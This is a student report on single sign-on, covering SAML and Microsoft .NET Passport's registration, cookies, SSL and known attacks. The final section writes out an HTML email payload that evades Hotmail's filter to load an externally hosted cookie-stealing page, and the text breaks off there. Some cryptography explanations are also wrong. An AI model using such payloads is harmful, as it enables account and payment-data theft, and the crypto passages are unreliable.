document - Computer Science
advertisement
Single Sign-on Systems
Group: SS5
ID:
667618
658490
607349
655507
Content
1 Introduction .................................................................................................................................. 3
2 Single sign-on System................................................................................................................ 4
2.1 What is Single sign-on .................................................................................................... 4
2.2 How does single sign-on works? ................................................................................... 4
2.3 Password synchronization V.S. single sign-on ............................................................ 5
3.SAML single sign-on ................................................................................................................... 7
3.1 What is SAML ................................................................................................................... 7
3.2 How does it works............................................................................................................ 7
3.3 What is SAML composed of ........................................................................................... 9
4 .NET Passport ........................................................................................................................... 11
4.1 Registration Process ..................................................................................................... 11
4.1.1 Information Stored in a .NET Passport............................................................ 12
4.1.2 Unique Identifiers................................................................................................ 12
4.1.3 Captcha telling human from computers .......................................................... 13
4.1.4 E-mail Validation ................................................................................................. 14
4.2 Authentication Process ................................................................................................. 14
4.2.1 Cookies written by Passport ............................................................................. 15
4.2.2 Navigate to another Participating Site ............................................................. 16
4.2.3 Passport Sign-in and Sign-out.......................................................................... 16
4.3 Secure Sockets Layer (SSL) ........................................................................................ 16
4.3.1 Public Key Cryptography for Authentication ................................................... 17
4.3.2 Digital Signature s ............................................................................................... 17
4.3.3 Certificate Mechanism ....................................................................................... 18
4.3.4 Potential attack! .................................................................................................. 19
4.3.5 Message Authentication Code (MAC) ............................................................. 19
5 MS Passport security weaknesses......................................................................................... 20
5.1 Cookies problem ............................................................................................................ 20
5.2 Key management........................................................................................................... 20
5.3 Passport server attack .................................................................................................. 21
5.4 Hotmail credential assignment..................................................................................... 21
6. Attack to the MS Passport ...................................................................................................... 22
6.1 Fake merchant attack .................................................................................................... 22
6.2 Active attack.................................................................................................................... 23
6.3 DNS attack ...................................................................................................................... 24
6.4 Cookies Attack................................................................................................................ 25
7. Advantages of Passport .......................................................................................................... 28
8. Business use (MS Passport) .................................................................................................. 29
8.1 Business use of Passport ............................................................................................. 29
8.2 Business Benefits of Passport ..................................................................................... 29
9. about the Liberty Alliance........................................................................................................ 30
10. Conclusion .............................................................................................................................. 31
Bibliography................................................................................................................................... 32
2
1 Introduction
It is very common for people to shopping on the web, or has the Internet banking. To concern
about the security issue, the online vendors often require a client authentication by a username and
a password. However, a problem might occur at his point, which is the multiple username and
password for different accounts. Users might have different usernames and passwords, sometimes
to remember all of that is very difficult, and it’s not a good solution to write down the username
and password due to the security reason.
An ideal solution for above problem is one user only need single username and password to be
authenticated by multiple services. Single sign-on is a way to solve this problem. Single sign-on is
the term used to represent a system whereby users need only remember one username and
password, and authenticated can be provided for multiple services.
In the following report, what is the single sign-on system, how it works will be illustrate in detail.
Two example of the single sign-on system ----SAML and Microsoft Passport , will be introduced
in this report. In the conclusion the disadvantage and advantage of single sign-on system will be
discussed.
3
2 Single sign-on System
2.1 What is Single sign-on
Single sign-on is a mechanism to let “users sign onto a site only once and are given access to one
or more applications in a single domain or across multiple domains.”i. It can be illustrated in two
different scopes. One is in the client/server relationship; the other is in the e-commerce domain.
1) “In any client/server relationship, single sign-on is a session/user authentication process that
permits a user to enter one name and password in order to access multiple applications. “ ii
When the session is initiated, the single sign-on will be requested, after pass the authentication,
it then will authenticates the user to access to all the partner domains, and eliminates future
authentication prompts when the user switches applications during that particular session.
2) “In e-commerce, the single sign-on (sometimes referred to as SSO) is designed to centralize
consumer financial information on one server - not only for the consumer's convenience, but
also to offer increased security by limiting the number of times the consumer enters credit
card numbers or other sensitive information used in billing.”iii Microsoft's "Passport" single
sign-on service (averaging over 40 million consumers and more than 400 authentications per
second) use the wallet protocol to store users’ financial information.
2.2 How does single sign-on works?
When the user requests a resource from the server, the server collects the access-control lists
(ACLs) associated with that resource and evaluates them. If the server's evaluation of the ACLs
requires identification of the user, the server requests client authentication. The client
authentication can be achieved by many different way, one possible solution is to use the Secure
Sockets Layer (SSL) protocol, which is the way to transmitting private documents( can be the user
information, such as credit card numbers) via the Internet. SSL works by using a private Key to
encrypt data that's transferred over the SSL connection. (Microsoft passport using the cookies to
store the user information, this will be illustrate in detail in the following report) After the server
has established the user's identity, optionally including user/group information stored in a
Lightweight Directory Access Protocol (LDAP) directory, it continues its evaluation of the ACLs
and authorizes or denies access to the requested information according to the user's access
privileges. In the Figure 1, the basic elements of the ACL evaluation process are illustrated.
Figure 1
Single sign-on uses certificate-based authentication
4
It can be seen from figure 1 that in the client authentication part, the SSL certificate replaces the
password. The certificate sent over the network with client authentication based on the Secure
Sockets Layer (SSL). Therefore, as long as user login once, and obtain the authentication
certificate, and other domains’ client authentication will be done by that certificate. Once the
certificate is created, other party cannot change that certificate, it will be sent form domain to
domain thought a secure channel. The certificate stores the client’s information, the issues time
and the validity duration. When the validity duration past, a new client authentication is required.
2.3 Password synchronization V.S. single sign-on
People might think that, as long as use the same password and username for different application,
can solve the multi-login problem. Actually a password synchronize software has been develop in
order to work out the multi-login problem. However, this solution might not completely achieve
the aim.
“The password synchronization is the process of changing each password for different
applications to the same value, so that the user always enters the same password. Once you install
password synchronization software, users will enter the same password when they login to any of
the synchronized systems, such as to their network, finance system, email, calendar or the
mainframe.”iv
Although the password synchronization might partly achieve the single sign-on, nevertheless
compare to the real Single sign-on mechanism, it is not the perfect solution. The comparison
between the password synchronization and the single sign-on is given in the following table.
Comparison of password synchronization with single sign-on
Password synchronize
Process
Simply
changes
all
applications to the same
password. User continues to
login to each of those
Single sign-on
Use single username and
password to sign in to one site,
the client authentication of
other sites will finish by the
5
applications, separately, but
uses the same password at
each login
specific server
Login times
Several times depends one
the application required
Once for every domains
Manage other credential data
Manage passwords only, other
credential data such as
usernames, IP addresses and
database names not manage.
Use specific protocol to
manage
the
client
authentication
Weak password
Can only match the policy of
the weakest system, for
example, if an application
supports a maximum length of
four character passwords only,
all
applications
in
the
synchronized group can only
be protected by a maximum
length of four characters.
User don’t need to worry
about
the
password
authentication,
all
the
authentication is done by the
server and the specific
authentication mechanism.
Security
Once one application is
compromised, all the other
applications can be accessed,
the sensitive data will be
obtained.
Can encrypt to the sensitive
data and send it by the SSL
save channel
6
3.SAML single sign-on
3.1 What is SAML
“SAML (Security Assertion Markup Language) is an XML framework for exchanging security
information over the Internet.”v The security information are user authentication, entitlements and
attribute information. Different security services systems can be interoperated to the SAML. The
exchange of the identity and entitlement between one service and the others is enabling by
residing the security information within a system's security mechanisms.
The mechanisms or approaches to authentication or authorization which SAML using are not a
new way, however it defines a XML structure of the documents that transport security information
between services.
3.2 How does it works
The client authentication
Authentication is a core part of the single sign-on mechanism. In the SAML, the client
authentication is done by an Identity provider. The Identity provider authenticate the user/client, if
the authentication is passed, it will send a authentication assertion to proof the client has passed
the authentication. When user requests to access the service provider, the service provider will first
check the authentication assertion, and sent this assertion to the identity provider to confirm the
authenticity of this assertion. The Identity provider then will send back a confirm message to the
service provider the assertion is true. As seeing the confirm message, the service provider then
will allow client to access to it’s resource. Figure 2 below shows the process of the client
authentication.
Figure 2 Client authentication process
1. The service provider received the client request, and it sent the request to Identity provider
to do the client authentication.
2. Identity provider authenticate the client, create the assertion , and pass it back to the service
7
provider.
In the following, a sample SAML-compliant request is sent from a relying party (service provider)
requesting password authentication by the issuing party (Identity provider).
<samlp: Request ...>
<samlp: AttributeQuery>
<saml: Subject>
<saml: NameIdentifier SecurityDomain="sun. com" Name="rimap"/>
</saml: Subject>
<saml: AttributeDesignator AttributeName="Employee_ ID"
AttributeNamespace="sun. com">
</saml: AttributeDesignator>
</samlp: AttributeQuery>
</samlp: Request>
•In response, the issuing authority asserts that the subject (S) was authenticated by means (M) at
time (T).
<samlp: Response MajorVersion="1" MinorVersion="0"
RequestID="128.14.234.20.90123456"
InResponseTo="123.45.678.90.12345678"
StatusCode="/features/2002/05/Success">
<saml: Assertion MajorVersion="1" MinorVersion="0"
AssertionID="123.45.678.90.12345678" Issuer="Sun Microsystems, Inc."
IssueInstant="2002- 01- 14T10: 00: 23Z">
<saml: Conditions NotBefore="2002- 01- 14T10: 00: 30Z" NotAfter="200201- 14T10: 15: 00Z" />
<saml: AuthenticationStatement AuthenticationMethod="Password"
AuthenticationInstant="2001- 01- 14T10: 00: 20Z">
<saml: Subject>
<saml: NameIdentifier SecurityDomain="sun. com" Name="rimap" />
</ saml: Subject>
</ saml: AuthenticationStatement>
</ saml: Assertion>
</ samlp: Response>
Securing Web Services
In order to carry the security and identity information between Identity provider and the service
provider, the SAML assertions can be add a SOAP Header blocks. With the SOAP header blocks,
the assertions can be used as Security Tokens to do the service transactions. (The Liberty
Alliance's ID-Web Service Framework also uses SAML assertions as the base security token
format for enabling secure &privacy respecting access to identity-based web services.)
8
“SOAP stands for Simple Object Access Protocol is a lightweight protocol for the exchange of
information in a decentralized, distributed environment. It is an XML-based protocol that consists
of three parts: an envelope that defines a framework for describing what is in a message and how
to process it, a set of encoding rules for expressing instances of application-defined data types, and
a convention for representing remote procedure calls and responses. SOAP can potentially be used
in combination with a variety of other protocols; the primary transmission protocol is over
HTTP.”vi
3.3 What is SAML composed of
SAML is composed of distinct but interrelated component. The components of the SAML are:
Assertions
Request/response protocols
Bindings (the SOAP-over-HTTP method of transporting SAML requests and responses)
Profiles (for embedding and extracting SAML assertions in a framework or protocol)
vii
Assertions
As illustrate before, the Assertions if made by the Identity provider. It’s a package of information
that supplies one or more statements. There are four different type of the assertion statement.
Authentication: The specified subject was authenticated by a particular means at a particular ti
me.
•Attribute: The specified subject is associated with the supplied attributes.
•Authorization Decision: A request to allow the specified subject to access the specified resource
has been granted or denied.
viii
The outer structure of the assertion is generic, and simple, common elements are build in the
assertion. The information it provides are:
Issuer ID and issuance timestamp
Assertion ID
Subject
Name and security domain
Subject's authentication data (optional)
Advice (optional additional information provided by the issuing authority)
Conditions under which the assertion is valid
Assertion validity period (NotBefore and NotOnOrAfter)
Audience restrictions
Target restrictions (intended URLs for the assertion)
Application specific conditions
Protocol
Different kinds of protocol are applied to the SAML. These protocols allow the services providers
to request and the Identity provider to response. The service providers can:
•Request one or more assertions (includes a direct request of the desired assertions, as well as
9
querying for assertions that meet particular criteria)
•Request that a principal be authenticated with the corresponding assertion returned
•Request that a name identifier be registered
•Request that a federation be terminated
•Retrieve a protocol message that has been requested by means of an artifact
•Request a near-simultaneous logout of a collection of related sessions (“single logout ”)
•Request a name identifier mapping
Bindings
Mappings from SAML request-response message exchanges into standard messaging or
communication protocols are called SAML protocol bindings. ix
Profiles
Generally, a profile of SAML defines constraints and/or extensions in support of the usage of
SAML for a particular application – the goal to enhance interoperability by removing some of the
flexibility inevitable in a general usage standard.x
10
4 .NET Passport
Microsoft® .NET Passport is an implementation of Single Sign-On system, based on cookie and
employing security technique to prevent attacks. It includes the Passport single sign in service and
the Kids Passport service.
Passport service simplifies sign in and registration, allowing easy access without repetitive
registrations. Additional, users can store common personal information in Passport profile.
Kids Passport service is the business application of .NET Passport which allows parents to modify
profile information of their children.
In this part we call any web site, joining the .NET Passport, participating site.
4.1 Registration Process
Registration process is dealt in passport service. When user registers for a Passport, they are
opening a Passport Account with a 64-bit Passport User ID which is shared with participating
sites.
Figure 1:
The Registration Process.
xi
1.
In this example the user browses to Site A, a participating site or service (or browses to www.passport.com), and
they click the “Sign In” button (or click the “Register” button on Passport.com).
2.
The user is redirected to a co-branded registration page displaying the registration fields that were chosen by
Site A. (The minimum number of fields required is two: email name and password.) Here the user chooses
whether or not they want to opt in to share their information with other Passport-enabled sites that they sign in to.
3.
The user reads and accepts terms of use (or declines, and the process ends), and submits the form. (On
Passport.com the user is shown a congratulations page and sign up process ends here.)
4.
The user is then redirected back to Site A with their encrypted authentication ticket and profile information
attached.
5.
Site A decrypts the authentication ticket and profile information and continues their registration process, or grants
access to their site.
NOTES: Sites B and C do not receive any information about the user.
software.
The user does not need to download any
The minimum amount of information user should provide while registering is : e-mail address and
password. This password does not match the e-mail password, it is only used to get authentication
11
from Passport service.
4.1.1 Information Stored in a .NET Passport
.Net Passport account can store not only Credential information such as e-mail address and
password, but also Profile data which is shared between participating sites and passport service.
Passport takes e-mail address as account. So when registering, e-mail address and password are
the necessary information users should provide. For an extra layer of security, most of
participating sites normally require an additional security key at sign in. Additional, users could
set three secret questions in case of forgetting the security key.
Profile information stores those data users are willing to share. E-mail address is the one that can
be both credential and profile information.
xii
Account Information Chart
Information
Data
Type
Required to create a Shared with other
Passport?
sites?
E-mail Address (Sign in
Credential
Yes
If user opts-in
name)
and Profile
Password
Credential
Yes
Never
Security Key
Credential
Optional
(However
a
Never
participating site may require
the use of a Security Key)
Birth Date
Profile
Optional, what fields are used is
Country / Region
determined by the site that
First Name
registers the user.
If user opts-in
Gender
Last Name
Occupation
Postal Code
Preferred Language
State
Time Zone
4.1.2 Unique Identifiers
When registering successfully, each account is assigned a 64-bit unique identifier, Passport User
ID (PUID). This PUID will be sent (encrypted) to participating site as the authentication credential
when a Passport user signs in. As it is up to the user whether they want to share their e-mail
address and other information, sites cannot depend on this type of information to identify the user.
12
4.1.3 Captcha telling human from computers
.NET Passport service employs Captcha technology, which asks registers to type in alphanumeric
characters from a picture, to telling human from computers.
Figure 2: Telling human from computers.
As attackers can easily submit thousands of fake registrations in a minute by program, it
overwhelms the capacity of a registration system and causes service server to go offline.
Captcha
stands for “Completely Automated Public Turing Test to Tell Computers and
Humans Apart.” xiii
Captcha test was raised in November 1999, when students at Carnegie Mellon and
students at MIT wrote voting “bots” programs to win in an online poll asking which the
best graduate school in computer science was. Such attacks can also occur in account
registration and email sending.
Captcha test is based on the human ability to read distorted and corrupted text, and
current computer programs can not do the same. Captcha works by choosing a certain
number of alphanumeric characters, and then displaying them corrupted and distorted in
an image; after that Captcha asks the user to type the characters displayed in that image.
While human users have no problem typing the words displayed, current bots are simply
unable to do the same.
13
4.1.4 E-mail Validation
In the last step of registration, the email address registered in Passport need to be verified.
Passport service sends a welcome e-mail message informing the user about the service. By
clicking the appropriate link in the e-mail, user can either validate the account or cancel it. This
process can efficiently prevent e-mail addresses from being used in Passport accounts without the
permission of the true owner of that e-mail address, which can lead to confusion and
inconvenience for both the consumer and the participating site.
4.2 Authentication Process
Passport authentication messages take the form of electronic “tickets”-- cookies, with this ticket
users are authorized to access pages in participating sites.
Passport service separates the participating site user interface from the passport service domain.
The same as registration process, after clicking the standard Passport sign-in, user will be
redirected the sign-in page on Passport.com. Once the user is verified, Passport writes a cookie,
called “ticket-granting-cookie”, on the user’s browser. This cookie can be used as electronic
“tickets” in subsequent access. Then Passport redirects browsers to the participating site.
Figure 3:
The Passport Authentication Process
xiv
1.
User browses to participating site or service (Site A in this example). User clicks “Sign In” button or link.
2.
User is redirected to Passport.
3.
Passport checks if the user has a “Ticket Granting Cookie” (TGT) in their browser’s cookie file (one that meets
the rules that Site A has set), if one is detected they skip to step 4 and never see the Passport login UI. If the
TGT does not satisfy the time since sign in rule requested by Site A, then Passport removes information that Site
A passed on the query string and redirects the user to a page that asks for the currently signed-in users’
password. This new page has a short URL in the passport.net domain. If the user enters the correct
information, they proceed.
4.
The user is redirected back to Site A with their encrypted authentication ticket and profile information attached (if
the user has chosen to share it, and if it is present).
5.
Site A decrypts authentication ticket and profile information, and signs the customer into their site.
6.
User accesses the page, resource, or service they requested from Site A.
NOTE: That Sites B and C do not receive any information in this process.
Sites B and C unless the user chooses to sign in at those sites.
No information about a user is shared with
14
4.2.1 Cookies written by Passport
Passport uses cookies as electronic ticket that allows users to move from page to page without
having to sign in again and again. But we should notice that if the user’s browser does not support
cookie, passport service will not work.
Cookies with credentials are encrypted with Passport key and written only to the authority domain,
can not be directly accessed by participating site.
Cookie Table
xv
Label
Common
Name
Description / Contents
MSPAuth
Ticket
Encrypted with the Passport key. Contains the Passport
timestamps
(last
refresh
and
last
manual
sign
in),
saved-password flag, key version verification and any flags
set by network servers.
MSPProf
Profile
Encrypted with the Passport key. Contains each of the core
profile attributes, if they are present and the user has chosen
to share them.
MSPSec
Ticket-Granting
Sent via HTTPS for all browsers that allow HTTPS cookie
Cookie
writes. Contains SSL-encoded PUID and password, used for
silent sign in.
MSPVis
Participating
Each new Passport Participant site visited by a user has its
sites Cookie
site ID written to this cookie. Used by the Login server to
compile the list of sites that must be signed out from when the
user clicks any Sign Out link. No encryption.
Others with profile information are encrypted with participating sites key and written to the
domain of participating sites. These cookies enable the user to sign in at any Passport participating
sites during a browser session.
Label
Common
Name
Description / Contents
MSPAuth
Ticket
Encrypted with participating sites Passport key. Contains the
Passport timestamps (last refresh and last manual sign in),
saved-password flag, key version verification, and other flags.
MSPProf
Profile
Encrypted with participating sites Passport key. Contains each
of the core profile attributes, if they are present and the user
has chosen to share them.
MSPSecAuth
SSL Channel
Sent via HTTPS for all browsers that allow HTTPS cookie
writes. Used to indicate the participating site is using the SSL
channel feature.
15
4.2.2 Navigate to another Participating Site
Literally, passport is an authentication with which people can go anywhere they are
authorized. .Net Passport provides an electronic “ticket” (as the form of cookie), within the period
of validity, the user can access the site from page to page, even transfer to another participating
site without re-entering their credentials.
When transferring to another participating site, the user is redirected to Passport server, as the first
sign in. But Passport server will check the “ticket-granting-cookie” stored on the browser, if the
timestamp in the cookie is fresh enough, the user does not need to re-enter the credential, and the
encrypted ticket and profile cookies will be written on the browser.
4.2.3 Passport Sign-in and Sign-out
Visiting each Passport participating site, user
will sign in through the co-branding sign-in
page (Figure 4). There are two check boxes
in this page helping users log on. If the user
check the box “I’m using a public
computer.”, passport will not automatically
enter the e-mail address after the user logs
into the computer again. If the box “Sign me
in automatically” is checked by the user,
passport will type the e-mail address and
password for the user automatically. It
means user will not always see the Passport
sign in page and will be able to freely use
participating sites without inputting any
information, unless they click the Passport
sign out logo. Normally, when a user signs
out by clicking the sign out logo, all
Passport cookies from all the participating
sites during browser session will be deleted
from the computer.
4.3 Secure Sockets Layer (SSL)
SSL, short for Secure Sockets Layer, is a protocol developed by Netscape for transmitting private
documents via the Internet. SSL works by using a public key to encrypt data that's transferred
over the SSL connection. Both Netscape Navigator and Internet Explorer support SSL, and
many Web sites use the protocol to obtain confidential user information, or authenticate resisted
16
user. By convention, URLs that require an SSL connection start with https: instead of http:.
4.3.1 Public Key Cryptography for Authentication
Public-key encryption is a cryptographic system that uses two keys -- a public key known to
everyone and a private or secret key known only to the recipient of the message. Moreover, it is
virtually impossible to deduce the private key if you know the public key.
In authentication process, service sends random message to user. When receiving the message,
user responses service with the encrypted received message with his/her public key. Assume user
disclose public key to service (discussed in the "Handing Out Public Keys" section). Service
decrypts the response message, if it matches the original message, the user passes the
authentication, because an imposter presumably would not know user’s private key and so would
be unable to properly encrypt the random message.
Alice -- > Bob Random msg
Bob -- > Alice {Random msg}
Bob’s private key
Figure 5:
Public Key Cryptography for Authentication.
In this example, Alice plays the role of service server. Bob is a registered user. And Bob has disclosed public key to
Alice.
{Random msg}Bob’s private key
means message encrypted with Bob’s private key.
4.3.2 Digital Signature s
No one would like to encrypt unknown message with his private key and send it to others, as you
have to hold responsible for the encrypted value To reduce the risk of being attacked, we prefer to
constructs a un-reversed message digest and send it to the service server. An impersonator has
difficulty finding a different message that computes to the same digest value, but the server can
compute the same digest and authenticate User by decrypting User's message and comparing the
values. Actually, SSL takes the technique mentioned above, which is known as a digital signature.
When responding, User generates his own message, constructs a digest from it, and sends the
message with its encrypted digest to sever.
17
Figure 6:
Digital Signature.
Bob generates his own message, constructs a digest from it, and sends the message with its encrypted digest to Alice
Alice -->Bob
hello, are you Bob?
Bob-->Alice
Alice, This Is Bob {digest [Alice, This Is Bob]}Bob’s private-key
4.3.3 Certificate Mechanism
How can a user hand out a public key in a secure manner? Sending the public key in a physical
way is the most secure way. But it seems impossible.
SSL employs certificate mechanism
A certificate contains the following information: xvi
•The name of the certificate issuer.
•The entity for whom the certificate is being issued (also known as the subject).
•The public key of the subject.
•Some time stamps.
The certificate is signed by using the private key of the certificate issuer. Certificates are a
standard method to bind a public key to a name.
Using certificate technology, service server can examine User's certificate to see if the certificate
has been forged.
Alice -->Bob
hello
Bob-->Alice
Hi, I'm Bob, bob’s certificate
Alice-->Bob
prove it
Bob-->Alice
Alice, This Is Bob { digest[Alice, This Is Bob] } bob’s private-key
After passing authentication, service server will send User a secret key, which will be used as a
key to a symmetric cryptographic algorithm.
Alice -->Bob
{secret} Bob's public_key
Bob -- > Alice
{some message} secret_key
18
4.3.4 Potential attack!
Bob-->Mallory {some message}secret-key
Mallory-->Alice
Garble [{some message}secret-key ]
Figure 7:
Security Interference
Bob and Alice’s communication maybe observed by attacker Mallory. Mallory is sitting between Alice and Bob, Mallory
can pass most of the information back and forth unchanged, but garble certain messages. Mallory may get lucky and
produce a valid message.
4.3.5 Message Authentication Code (MAC)
To reduce the potential attack, SSL uses a 128-bit MAC. A message authentication code is a piece
of data that is computed by using a secret and some transmitted data.
MAC: = digest [some_message, secret]
Alice-->Bob
Bob --> Alice
Alice --> Bob
Bob --> Alice
Alice --> Bob
Bob--> Alice
hello
Hi, I'm Bob, bobs-certificate
prove it
{digest [Alice, This Is Bob] } bobs-private-key
ok bob, here is a secret {secret} bobs-public-key
{some message, MAC} secret-key
Once Mallory attempts to garble messages, the MAC will reveal that the messages do not come
from Bob. Alice and Bob can discover the incorrect MAC value and stop communication.
SSL provides a secure way to transmit data from server and user, through Certificate, MAC, and
Digital Signature technology.
19
5 MS Passport security weaknesses
As e-commerce, users need a tool to help them to manage authentication and personal information.
So MS passport is this kind of tool. It is an attempt to meet this need while requiring no changes to
existing browsers and servers. However, on the other side, there are some practical risks of MS
passport protocol, as follows:
5.1 Cookies problem
Cookies store encrypted credential information of user in the browsers, and the system will not
function without cookies. Although passport cookies are proofs of authentication whose lifetimes
are determined only by the lifetime of the user’s web browser, passport cookies contains sensitive
data. So on a public machine, a user who forgets to log out of a passport account could leave valid
authentication behind on the machine for any user to recover.
If user ticks the persistent cookies option, Passport will leave authentication, in form of browser
cookies on user’s machine. On one side, as the white paper says “This option keeps a consumer
disconnects from the Internet, closes the browser, or turns off the computer.”xvii So the user is not
required to retype the Email Address and password. It is very convenient to user. However, on the
other side, it may lead to misuse of this option or the cookies may be theft. As the cookies is all
that is necessary to impersonate the valid user of that cookie, the theft of the authentication
information is undetected, and the attacker can also use user’s passport and Wallet unlimitedly. It
could be much more dangerous, if you use this in a public machine.
Another important aspect is that cookies are more social than technological. When you browse
some web pages, you may be recorded or spied by Microsoft passport authentication server and
your personal information will be exposed. It maybe compromise user privacy, which is a serious
problem.
5.2 Key management
In passport protocol, the passport server share triple DES keys with each merchant. These keys
should be generated randomly and securely, then transferred in a secure way. It is a good way to
transfer the key by physical mail or phone. However, in practical, these keys are transferred by an
SSL connection. This is likely to lead to potential breaches.
On top of that, passport use a single key to encrypt all of the cookies and store the information in
passport cookies on user’s machines. That will cause a risk of exposure of that key. So it could be
a better way to use a master key to generate a unique key. It shows as follows: Using the master
key that is used to encrypt cookies, generate a unique key per client by encrypting the client
address with the master key, and using the resulting cipher text as the encryption key for that client.
20
Thus, the master key is used only as a key encryption key. If one key is attacked, Passport cookies
on the other client are still safe.
5.3 Passport server attack
In traditional web authentication way, each merchant is responsible for the authentication
information of customers, but in MS passport single sign on system, passport server, as a central
point, sets up a server that stores all the data of users and makes decisions about the authenticity of
users. On account of storing all the information in a central location, passport server is an
extremely attractive target for attacker.
5.4 Hotmail credential assignment
When users log into Hotmail, they actually run the passport protocol, and the Hotmail server act as
a merchant. Unfortunately, Hotmail has been found with a few security problems, so attacker is
easy to log into user’s Hotmail account without knowing user’s password. This will cause a
serious problem. Attacker will steal the user’s all information, and use user’s account at the other
merchants.
For example, Emil Glosserman, Internet security expert, twice attack Microsoft Hotmail and
Passport server system. In the first attack, he used 3 lines code to cheat Hotmail filter and
succeeded, then he got user’s Passport ID and credit card information. What is more, in the second
attack, he only used 1 line code and get the result as above. Fortunately, he had done nothing
about user’s account, and reported the security hole to Microsoft.
21
6. Attack to the MS Passport
Because Passport store user’s credentials and wallet information which is so attractive, and it
also gets a lot of security weaknesses. It is obvious several times attacked by some people.
Here, there are some particular attacks to Microsoft Passport.
6.1 Fake merchant attack
Assuming users have got accustomed to using passport. They trust the server is secure and enjoy
the convenience of passport.
We take Bob and Mallory for example, Assuming Mallory (Malicious Party) is bogus merchant
and also a attacker. Bob is a passport user.
(1) First, in order to attack Bob’s system, Mallory sets up a phony web store to sell some
attractive things.
(2) In addition, Mallory gets a certificate for a web site, called pasport.com. And Mallory sets up
his web site with all of the text and image, which would exactly show on a real passport.com
customer site.
(3) When Bob visits the phony web site, Bob want to buy something, then click the sign-in, the
server creates a redirect to Mallory’s pasport.com. Bob is in the habit of filling his Email Address
and Password. So He does not notice the misspelled URL, or check the certificate of this site.
(4) After that, The attacker Mallory has got Bob’s valid authentication information, and he can
now go to online shop, use Bob’s wallet service on behalf of Bob.
22
6.2 Active attack
Assuming Bob is passport user and very trust Passport Server, Alice is a trustful merchant,
Mallory is a attacker. Assuming Mallory has already accessed to network between Bob and Alice,
Mallory could rewrite packets passing between Bob and Alice.
(1)First, Bob sends a request to Alice (merchant), and want to communicate with Alice.
(2)Alice replies to Bob to use a login service at www.passport.com.
(3)Now, the attacker Mallory, waiting between Bob and Alice, interrupts the packet that Alice
sends to Bob, and rewrites the URL in the redirection to his fake Pasport.com web site.
(4)Bob visits M’s fake passport web site, filling with the login information. He does not realize the
risk because of the same image of passport.com web site existing in Mallory’s web site.
(5)Until now, the attacker has succeeded to attack the system. Then Mallory acts as a proxy
between Bob and Alice, and between Bob and Passport Server.
23
There are two reasons why Mallory has succeeded to attack system, one is the redirection from
Alice is not protected by SSL protocol. The other is Passport’s use of SSL connections cannot
prevent the Mallory from reading and rewriting each packet. So Bob is impossible to notice the
proxy(M) on his behalf.
6.3 DNS attack
The security of Passport is heavily decided by the Domain Name System. So the attacker Mallory
who controls Bob’s DNS service could simply rewrite passport.com to the IP address of Mallory’s
fake pasport.com. The condition is that Mallory firstly obtains a certificate for a domain, call
passport.com. Mallory must prove to some legal certificate authority to confirm his use of the
domain name. Given the abovementioned quantity of root certification authorities, the existence of
one weak to cheat seems likely. The user is in the habit of filling his Email Address and password,
so he does not notice the misspelled URL, or check the certificate. Even if he did check the
certificate, he might not notice the misspelling. In practice, any URL, even one that does not
resemble the word “passport” would probably work as well. And it will get the same result as
above.
24
6.4 Cookies Attack
When you are directed to a server in the .passport.com domain, you login to your Passport account,
where you authenticate with a user name and password, a variety of cookies are set in the
passport.com domain. If you are logging into a site using Passport that is not itself passport.com,
you are then redirected back to that site in a manner that sets a variety of cookies in that site's
domain.
There are two most important cookies:
1. MSPSec cookie: it is the cookie that authenticates you to Passport to implement the single
sign on feature, i.e., to allow you to be transparently authenticated to other sites that support
Passport.
2. MSPAuth cookie: This cookie identifies you to the server via the 64-bit Passport Unique ID
(PUID) associated with your account, which is set individually for each "participant domain" at
login time, in addition to being set in the domain authority's domain.
If you select a "keep me logged in" option when you login to Passport, the cookies that are set are
permanent cookies. on contrary, they are session cookies that go away when your browser exits.
The Implementation: Passport Wallet
The Passport Wallet is a fairly simple application implemented on top of Passport that stores your
credit card and contact information. Merchants can support on their site to allow users to use the
information in their wallet to automatically fill out the billing and shipping information as a part of
"Passport Express Purchase". The Passport Wallet uses the .passport.com cookies to authenticate
you, as it resides in the passport.com domain.
You will be taken to a Passport server to select what billing and shipping information to send to
the merchant when in the process of checking out at a participating merchant. After submitting the
form, Passport redirects your browser back to the merchant with the information you selected.
This information is only encrypted using SSL; not using the participating site's key, so a hostile
client can stole it easily. As the three reasons following up:
1. User may have entered their password, but not intending to be used to access their Passport
Wallet. If someone logs into Hotmail then reads an email sent to them that uses one of a variety of
attacks to steal their Passport cookies, that attacker has then effectively stolen that user's Passport
Wallet, without the user ever knowing.
2. A "manual sign in" doesn't actually require that the user enter their password in some cases.
If you use the "my Hotmail inbox" feature of MSN Messenger, which gives you direct access to
your Hotmail inbox, behind the scenes that acts just as if you had actually entered your password,
MSN Messenger enter it on your behalf.
3. Cross Site Scripting Bugs: The various passport.com web sites have a number of Cross Site
Scripting vulnerabilities. All the cookies can be stolen. Because they are set for any server in
the .passport.com domain.
25
Examples:
Step One: Hotmail HTML Filtering Hole
There have been lots of holes found in Hotmail's HTML filtering in the past. There will continue
to be lots found in the future if Microsoft continues down their current flawed path of trying to
code in explicit support for blocking every freak case. Obviously, an exploit like this is enough to
allow someone else to access your Hotmail account and do nasty things with it. But that isn't the
central point here; the only reason I bother to include the Hotmail hole is since it was so quick to
come up with a new exploit, and it makes it more obvious that no user interaction is required to
steal the contents of the Passport Wallet. This exploit, as with everything else described in this
document, is designed to be used against IE, but exploits are possible for whatever browser you
want to pick that supports the features required to use Passport in the first place.
If you send the following email to a Hotmail account:
From: Jennifer Sparks <xxx@xxx.xxxx>
To: theuseryouwanttoexploit@hotmail.com
Content-type: text/html
Subject: Jack said I should email you...
Hi Ted. Jack said we would really hit it off. Maybe we can get together
for drinks sometime. Maybe this friday? Let me know.
<BR>
<BR>
<HR>
You can see the below for demonstration purposes. In a real exploit, you
wouldn't even see it happening.
<HR>
<BR>
<_img
foo="<IFRAME
width='80%'
height='400'
src='http://alive.znep.com/~marcs/passport/grabit.html'></IFRAME>" >
Then when the user reads it, it will load a frame with grabit.html in, which can then continue on
with Step Two. This doesn't require the execution of any javascript in the Hotmail message,
although the hole lets you do that. Obviously, you could make it so the user doesn't see any of this
going on.
Hotmail thinks the "<_img" is part of the start of a HTML tag, so it treats the characters inside that
supposed tag as attributes, etc. However, IE doesn't treat any tag starting with what it considers an
invalid character to be a tag at all, so it doesn't treat it as markup at all, and continues on to parse
the IFRAME tag.
Is IE wrong? You can argue about that. But if Hotmail didn't allow tags it knew nothing about, this
wouldn't be a problem. In general, most current browsers have quite complex rules for parsing
HTML that can behave in very unexpected ways. Allow what you know to be good and well
formed, don't just filter what you think is bad.
Remember, if you didn't have this Hotmail hole you could still just send a link and try to social
engineer the user to clicking on it. No part of this exploit relies on executing javascript in the
